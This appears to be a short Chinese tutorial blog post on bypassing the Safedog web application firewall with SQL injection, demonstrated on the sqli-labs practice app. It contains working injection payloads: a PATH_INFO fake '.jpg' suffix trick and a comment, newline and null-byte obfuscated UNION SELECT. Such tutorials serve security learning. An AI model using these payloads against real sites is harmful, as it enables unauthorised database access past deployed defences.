ByPass网站安全狗 by L0st

0x01环境搭建

服务器环境我是使用Xampp一键搭建的,要使用安全狗的话需要将apache作为系统服务启动:
进入xampp安装目录,以管理员权限运行 xampp-control 点击 service 那一列里的红叉,安装apache为系统服务,然后重启即可。

0x02初步测试

安全狗

这里我使用sqlilab第一关来演示:


SQLilabs

输入联合查询语句试试:


union select

0x03结合PHP特性伪造静态资源后缀绕过

PHP中的PATH_INFO特性

访问 http://......./3.php?id=1
等价于 http://......./3.php/xxxxxxx?id=1
而很多WAF为了节省资源与提高检测效率,直接省略了对于jpg,png,js类似静态资源后缀请求的检查,故构造payload
http://..../index.php/1.jpg?id=0' union select 1,@@version,user() -- -
效果:

0x04利用注释加换行符

\n 经过URL编码后为 %0A ,配合注释/**/造轮子:
id=1'union/*%00*/%23aaaaaaaaaaaaa%0A/*!/*!seleCt 1,2,3*/;%00
效果:

你可能感兴趣的:(ByPass网站安全狗 by L0st)